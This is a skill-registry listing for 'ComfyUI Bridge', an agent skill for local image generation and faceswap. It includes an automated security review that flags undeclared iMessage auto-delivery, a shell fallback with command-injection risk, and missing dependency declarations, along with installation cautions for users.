Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
ComfyUI Bridge
v0.1.0Generate images, faceswap, edit photos, animate expressions, and do style transfer via a self-hosted ComfyUI instance on your LAN. Your GPU, your models.
⭐ 0· 207·1 current·1 all-time
byAndrew Barnes@bortlesboat
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
high confidencePurpose & Capability
The skill's main purpose (drive a local ComfyUI bridge) matches the code. However, the queue processor includes iMessage delivery (imsg CLI) and macOS-specific conversion via sips; neither imsg nor sips are declared in required binaries or install metadata. Automatic messaging/delivery is not an obvious part of 'image generation' in the skill metadata and could surprise users.
Instruction Scope
SKILL.md instructs the agent to run the provided scripts and write media under ~/.openclaw — that is expected. But the included queue_processor.py will automatically send queued outputs via the imsg CLI to a default chat ID unless configured otherwise. The SKILL.md and metadata do not prominently warn that queued jobs may be posted to iMessage, and the processor constructs a shell fallback command (shell=True) for imsg which increases injection risk if fields are tampered with.
Install Mechanism
Install metadata only requests a brew formula for 'uv', which is sensible for running the scripts. There are no remote downloads or extracted archives. However, additional runtime dependencies (imsg CLI, optional Ollama, Homebrew path assumptions) are required but not declared as install-time requirements.
Credentials
The skill does not request secrets, which is good, but it expects a COMFYUI_BRIDGE_URL env var (documented in SKILL.md but not listed as required). More importantly, the queue processor interacts with the user's iMessage system (via imsg) and will read/write to the user's local message DB indirectly — this is a sensitive capability and is not represented in the declared env/permission model. Default chat target ("7") and automatic delivery are surprising and potentially an exfiltration channel.
Persistence & Privilege
The skill does not set always:true and does not modify other skills. It creates and uses local directories under ~/.openclaw for queued requests and media (normal for this purpose). The queue_processor can be run as a daemon, which would give it continuing background activity — acceptable for a queue processor but the combination of background processing + automatic iMessage delivery raises the blast radius.
What to consider before installing
This skill appears to implement a legitimate local bridge to your ComfyUI instance, but pay attention before installing/running the included queue processor: it will attempt to deliver queued outputs via the imsg CLI (iMessage) by default and uses a hard-coded imsg path (/opt/homebrew/bin/imsg) and a default chat ID. If you do not want automatic delivery, do not run queue_processor.py as a daemon, and inspect queued JSON files in ~/.openclaw/faceswap-queue before processing. Ensure you have the imsg binary and Homebrew binaries only if you intend message delivery. Be cautious about the shell fallback the processor uses (it runs a shell if the direct imsg invocation fails) — this increases command-injection risk if files in the queue dir are modified by an attacker. Finally, set COMFYUI_BRIDGE_URL explicitly and only run the bridge on trusted LAN hosts. If you want lower risk, use comfyui_generate.py interactively and handle delivery yourself rather than using the automatic queue processor.Like a lobster shell, security has layers — review code before you run it.
latestvk977c8bkvwcgzbqe6etg4csqh182zw62
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
Runtime requirements
🎨 Clawdis
Binsuv
Install
Install uv (brew)
Bins: uv
brew install uv